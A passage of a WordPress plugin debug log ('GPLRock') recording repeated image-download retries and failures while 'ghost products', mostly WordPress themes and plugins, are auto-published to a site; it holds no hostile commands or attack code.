12:11:28 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Divi-BodyCommerce.jpg for product divi-bodycommerce after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 12:11:28 UTC] GPLRock WARNING: Image download failed for product divi-bodycommerce. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Divi-BodyCommerce.jpg [06-Apr-2026 12:11:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: divi-bodycommerce [06-Apr-2026 12:11:30 UTC] GPLRock: Image downloaded successfully for product totaldesk-helpdesk-live-chat-knowledge-base-ticket-system (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99313662.jpg [06-Apr-2026 12:11:30 UTC] GPLRock: Using pre-downloaded image for product totaldesk-helpdesk-live-chat-knowledge-base-ticket-system: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-99313662.jpg [06-Apr-2026 12:11:30 UTC] GPLRock: Ghost product published with image - Product ID: totaldesk-helpdesk-live-chat-knowledge-base-ticket-system [06-Apr-2026 12:11:31 UTC] GPLRock: Image downloaded successfully for product wordpress-store-locator (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3af07ecb.jpg [06-Apr-2026 12:11:31 UTC] GPLRock: Using pre-downloaded image for product wordpress-store-locator: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3af07ecb.jpg [06-Apr-2026 12:11:31 UTC] GPLRock: Ghost product published with image - Product ID: wordpress-store-locator [06-Apr-2026 12:11:33 UTC] GPLRock: Image downloaded successfully for product corptrain-corporate-training-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c839931.jpg [06-Apr-2026 12:11:33 UTC] GPLRock: Using pre-downloaded image for product corptrain-corporate-training-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c839931.jpg [06-Apr-2026 12:11:33 UTC] GPLRock: Ghost product published with image - Product ID: corptrain-corporate-training-wordpress-theme [06-Apr-2026 12:12:01 UTC] GPLRock: Image download failed for product accentuate-a-professional-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:03 UTC] GPLRock: Image download failed for product accentuate-a-professional-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accentuate---a-professional-consulting-wordpress-theme-30001.webp for product accentuate-a-professional-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:05 UTC] GPLRock: Image download failed for product accentuate-a-professional-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:07 UTC] GPLRock: Image download failed for product accentuate-a-professional-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accentuate---a-professional-consulting-wordpress-theme-30001.webp for product accentuate-a-professional-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:10 UTC] GPLRock WARNING: Image download failed for product accentuate-a-professional-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/accentuate---a-professional-consulting-wordpress-theme-30001.webp [06-Apr-2026 12:12:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: accentuate-a-professional-consulting-wordpress-theme [06-Apr-2026 12:12:10 UTC] GPLRock: Image download failed for product jonny-personal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:12 UTC] GPLRock: Image download failed for product jonny-personal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jonny---personal-wordpress-theme-17238.webp for product jonny-personal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:14 UTC] GPLRock: Image download failed for product jonny-personal-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:16 UTC] GPLRock: Image download failed for product jonny-personal-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jonny---personal-wordpress-theme-17238.webp for product jonny-personal-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:18 UTC] GPLRock WARNING: Image download failed for product jonny-personal-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jonny---personal-wordpress-theme-17238.webp [06-Apr-2026 12:12:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jonny-personal-wordpress-theme [06-Apr-2026 12:12:19 UTC] GPLRock: Image download failed for product conflux-conference-and-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:21 UTC] GPLRock: Image download failed for product conflux-conference-and-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conflux---conference-and-event-wordpress-theme-16810.webp for product conflux-conference-and-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:23 UTC] GPLRock: Image download failed for product conflux-conference-and-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:25 UTC] GPLRock: Image download failed for product conflux-conference-and-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/conflux---conference-and-event-wordpress-theme-16810.webp for product conflux-conference-and-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:27 UTC] GPLRock WARNING: Image download failed for product conflux-conference-and-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/conflux---conference-and-event-wordpress-theme-16810.webp [06-Apr-2026 12:12:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: conflux-conference-and-event-wordpress-theme [06-Apr-2026 12:12:27 UTC] GPLRock: Image download failed for product lawnella-gardening-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:29 UTC] GPLRock: Image download failed for product lawnella-gardening-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawnella---gardening--landscaping-wordpress-theme-19821.webp for product lawnella-gardening-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:31 UTC] GPLRock: Image download failed for product lawnella-gardening-landscaping-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:34 UTC] GPLRock: Image download failed for product lawnella-gardening-landscaping-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawnella---gardening--landscaping-wordpress-theme-19821.webp for product lawnella-gardening-landscaping-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:36 UTC] GPLRock WARNING: Image download failed for product lawnella-gardening-landscaping-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lawnella---gardening--landscaping-wordpress-theme-19821.webp [06-Apr-2026 12:12:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lawnella-gardening-landscaping-wordpress-theme [06-Apr-2026 12:12:36 UTC] GPLRock: Image download failed for product brito-it-services-cyber-security-solutions-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:38 UTC] GPLRock: Image download failed for product brito-it-services-cyber-security-solutions-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brito---it-services--cyber-security-solutions-elementor-wordpress-theme-1260.webp for product brito-it-services-cyber-security-solutions-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:40 UTC] GPLRock: Image download failed for product brito-it-services-cyber-security-solutions-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:42 UTC] GPLRock: Image download failed for product brito-it-services-cyber-security-solutions-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brito---it-services--cyber-security-solutions-elementor-wordpress-theme-1260.webp for product brito-it-services-cyber-security-solutions-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:44 UTC] GPLRock WARNING: Image download failed for product brito-it-services-cyber-security-solutions-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/brito---it-services--cyber-security-solutions-elementor-wordpress-theme-1260.webp [06-Apr-2026 12:12:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: brito-it-services-cyber-security-solutions-elementor-wordpress-theme [06-Apr-2026 12:12:49 UTC] GPLRock: Image download failed for product cargo-transport-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:51 UTC] GPLRock: Image download failed for product cargo-transport-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cargo--transport--logistics-wordpress-theme-4194.webp for product cargo-transport-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:54 UTC] GPLRock: Image download failed for product cargo-transport-logistics-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:56 UTC] GPLRock: Image download failed for product cargo-transport-logistics-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:12:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cargo--transport--logistics-wordpress-theme-4194.webp for product cargo-transport-logistics-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:12:58 UTC] GPLRock WARNING: Image download failed for product cargo-transport-logistics-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cargo--transport--logistics-wordpress-theme-4194.webp [06-Apr-2026 12:12:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cargo-transport-logistics-wordpress-theme [06-Apr-2026 12:12:58 UTC] GPLRock: Image download failed for product rush-esports-gaming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:00 UTC] GPLRock: Image download failed for product rush-esports-gaming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rush---esports--gaming-wordpress-theme-17566.webp for product rush-esports-gaming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:02 UTC] GPLRock: Image download failed for product rush-esports-gaming-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:04 UTC] GPLRock: Image download failed for product rush-esports-gaming-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rush---esports--gaming-wordpress-theme-17566.webp for product rush-esports-gaming-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:06 UTC] GPLRock WARNING: Image download failed for product rush-esports-gaming-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rush---esports--gaming-wordpress-theme-17566.webp [06-Apr-2026 12:13:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rush-esports-gaming-wordpress-theme [06-Apr-2026 12:13:07 UTC] GPLRock: Image download failed for product emarat-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:09 UTC] GPLRock: Image download failed for product emarat-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emarat---construction-wordpress-theme-18655.webp for product emarat-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:11 UTC] GPLRock: Image download failed for product emarat-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:13 UTC] GPLRock: Image download failed for product emarat-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emarat---construction-wordpress-theme-18655.webp for product emarat-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:15 UTC] GPLRock WARNING: Image download failed for product emarat-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/emarat---construction-wordpress-theme-18655.webp [06-Apr-2026 12:13:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emarat-construction-wordpress-theme [06-Apr-2026 12:13:15 UTC] GPLRock: Image download failed for product tour-packer-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:17 UTC] GPLRock: Image download failed for product tour-packer-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tour-packer---agency-wordpress-theme-11663.webp for product tour-packer-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:20 UTC] GPLRock: Image download failed for product tour-packer-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:22 UTC] GPLRock: Image download failed for product tour-packer-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tour-packer---agency-wordpress-theme-11663.webp for product tour-packer-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:24 UTC] GPLRock WARNING: Image download failed for product tour-packer-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tour-packer---agency-wordpress-theme-11663.webp [06-Apr-2026 12:13:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tour-packer-agency-wordpress-theme [06-Apr-2026 12:13:24 UTC] GPLRock: Image download failed for product enova-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:26 UTC] GPLRock: Image download failed for product enova-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enova---multipurpose-business-wordpress-theme-13193.webp for product enova-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:28 UTC] GPLRock: Image download failed for product enova-multipurpose-business-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:30 UTC] GPLRock: Image download failed for product enova-multipurpose-business-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:13:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/enova---multipurpose-business-wordpress-theme-13193.webp for product enova-multipurpose-business-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:13:32 UTC] GPLRock WARNING: Image download failed for product enova-multipurpose-business-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/enova---multipurpose-business-wordpress-theme-13193.webp [06-Apr-2026 12:13:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: enova-multipurpose-business-wordpress-theme [06-Apr-2026 12:14:13 UTC] GPLRock: Image downloaded successfully for product ninja-forms-activecampaign (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdbf1e23.jpg [06-Apr-2026 12:14:13 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-activecampaign: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdbf1e23.jpg [06-Apr-2026 12:14:13 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-activecampaign [06-Apr-2026 12:14:16 UTC] GPLRock: Image download failed for product themebox-digital-products-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:14:20 UTC] GPLRock: Image download failed for product themebox-digital-products-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:14:24 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Themebox-Digital-Products-Ecommerce-WordPress-Theme.jpg for product themebox-digital-products-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 12:14:26 UTC] GPLRock: Image download failed for product themebox-digital-products-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:14:30 UTC] GPLRock: Image download failed for product themebox-digital-products-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:14:35 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/09/Themebox-Digital-Products-Ecommerce-WordPress-Theme.jpg for product themebox-digital-products-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 12:14:35 UTC] GPLRock WARNING: Image download failed for product themebox-digital-products-ecommerce-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/09/Themebox-Digital-Products-Ecommerce-WordPress-Theme.jpg [06-Apr-2026 12:14:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: themebox-digital-products-ecommerce-wordpress-theme [06-Apr-2026 12:14:36 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-cross-sell-and-upsell (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-90e67cdd.jpg [06-Apr-2026 12:14:36 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-cross-sell-and-upsell: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-90e67cdd.jpg [06-Apr-2026 12:14:36 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-cross-sell-and-upsell [06-Apr-2026 12:14:37 UTC] GPLRock: Image downloaded successfully for product mainwp-wp-compress-coupon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f715cbe0.jpg [06-Apr-2026 12:14:37 UTC] GPLRock: Using pre-downloaded image for product mainwp-wp-compress-coupon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f715cbe0.jpg [06-Apr-2026 12:14:37 UTC] GPLRock: Ghost product published with image - Product ID: mainwp-wp-compress-coupon [06-Apr-2026 12:14:39 UTC] GPLRock: Image downloaded successfully for product mythemeshop-pixelmag-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-daffef62.jpg [06-Apr-2026 12:14:39 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-pixelmag-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-daffef62.jpg [06-Apr-2026 12:14:39 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-pixelmag-wordpress-theme [06-Apr-2026 12:14:41 UTC] GPLRock: Image downloaded successfully for product wpfomify-learndash-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d14900b4.jpg [06-Apr-2026 12:14:41 UTC] GPLRock: Using pre-downloaded image for product wpfomify-learndash-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d14900b4.jpg [06-Apr-2026 12:14:41 UTC] GPLRock: Ghost product published with image - Product ID: wpfomify-learndash-addon [06-Apr-2026 12:14:42 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-pretty-plugins (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2851e029.jpg [06-Apr-2026 12:14:42 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-pretty-plugins: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2851e029.jpg [06-Apr-2026 12:14:42 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-pretty-plugins [06-Apr-2026 12:14:43 UTC] GPLRock: Image downloaded successfully for product graph-paper-press-sell-media-reprints (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56d932d7.jpg [06-Apr-2026 12:14:43 UTC] GPLRock: Using pre-downloaded image for product graph-paper-press-sell-media-reprints: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56d932d7.jpg [06-Apr-2026 12:14:43 UTC] GPLRock: Ghost product published with image - Product ID: graph-paper-press-sell-media-reprints [06-Apr-2026 12:14:45 UTC] GPLRock: Image downloaded successfully for product goodstore-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-90ed9341.jpg [06-Apr-2026 12:14:45 UTC] GPLRock: Using pre-downloaded image for product goodstore-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-90ed9341.jpg [06-Apr-2026 12:14:45 UTC] GPLRock: Ghost product published with image - Product ID: goodstore-woocommerce-theme [06-Apr-2026 12:14:47 UTC] GPLRock: Image downloaded successfully for product woocommerce-wooslider-products-slideshow (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b255a0dd.jpg [06-Apr-2026 12:14:47 UTC] GPLRock: Using pre-downloaded image for product woocommerce-wooslider-products-slideshow: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b255a0dd.jpg [06-Apr-2026 12:14:47 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-wooslider-products-slideshow [06-Apr-2026 12:15:23 UTC] GPLRock: Image download failed for product roma-elegant-blog-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:25 UTC] GPLRock: Image download failed for product roma-elegant-blog-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roma---elegant-blog--magazine-theme-20465.webp for product roma-elegant-blog-magazine-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:27 UTC] GPLRock: Image download failed for product roma-elegant-blog-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:29 UTC] GPLRock: Image download failed for product roma-elegant-blog-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/roma---elegant-blog--magazine-theme-20465.webp for product roma-elegant-blog-magazine-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:31 UTC] GPLRock WARNING: Image download failed for product roma-elegant-blog-magazine-theme. URL: https://meldwp.com/wp-content/uploads/roma---elegant-blog--magazine-theme-20465.webp [06-Apr-2026 12:15:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: roma-elegant-blog-magazine-theme [06-Apr-2026 12:15:31 UTC] GPLRock: Image download failed for product orio-a-creative-portfolio-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:34 UTC] GPLRock: Image download failed for product orio-a-creative-portfolio-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/orio---a-creative-portfolio--agency-theme-18198.webp for product orio-a-creative-portfolio-agency-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:36 UTC] GPLRock: Image download failed for product orio-a-creative-portfolio-agency-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:38 UTC] GPLRock: Image download failed for product orio-a-creative-portfolio-agency-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/orio---a-creative-portfolio--agency-theme-18198.webp for product orio-a-creative-portfolio-agency-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:40 UTC] GPLRock WARNING: Image download failed for product orio-a-creative-portfolio-agency-theme. URL: https://meldwp.com/wp-content/uploads/orio---a-creative-portfolio--agency-theme-18198.webp [06-Apr-2026 12:15:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: orio-a-creative-portfolio-agency-theme [06-Apr-2026 12:15:40 UTC] GPLRock: Image download failed for product dentario-dentist-orthodontist-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:42 UTC] GPLRock: Image download failed for product dentario-dentist-orthodontist-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dentario--dentist--orthodontist-medical-wordpress-theme-18627.webp for product dentario-dentist-orthodontist-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:45 UTC] GPLRock: Image download failed for product dentario-dentist-orthodontist-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:47 UTC] GPLRock: Image download failed for product dentario-dentist-orthodontist-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dentario--dentist--orthodontist-medical-wordpress-theme-18627.webp for product dentario-dentist-orthodontist-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:49 UTC] GPLRock WARNING: Image download failed for product dentario-dentist-orthodontist-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dentario--dentist--orthodontist-medical-wordpress-theme-18627.webp [06-Apr-2026 12:15:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dentario-dentist-orthodontist-medical-wordpress-theme [06-Apr-2026 12:15:49 UTC] GPLRock: Image download failed for product outstock-woocommerce-responsive-furniture-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:51 UTC] GPLRock: Image download failed for product outstock-woocommerce-responsive-furniture-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/outstock---woocommerce-responsive-furniture-theme-11427.webp for product outstock-woocommerce-responsive-furniture-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:53 UTC] GPLRock: Image download failed for product outstock-woocommerce-responsive-furniture-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:55 UTC] GPLRock: Image download failed for product outstock-woocommerce-responsive-furniture-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:15:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/outstock---woocommerce-responsive-furniture-theme-11427.webp for product outstock-woocommerce-responsive-furniture-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:15:57 UTC] GPLRock WARNING: Image download failed for product outstock-woocommerce-responsive-furniture-theme. URL: https://meldwp.com/wp-content/uploads/outstock---woocommerce-responsive-furniture-theme-11427.webp [06-Apr-2026 12:15:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: outstock-woocommerce-responsive-furniture-theme [06-Apr-2026 12:15:57 UTC] GPLRock: Image download failed for product priority-multipurpose-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:00 UTC] GPLRock: Image download failed for product priority-multipurpose-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/priority---multipurpose-wordpress-17048.webp for product priority-multipurpose-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 12:16:02 UTC] GPLRock: Image download failed for product priority-multipurpose-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 12:16:04 UTC] GPLRock: Image download failed for product priority-multipurpose-wordpress (attempt 2/3). 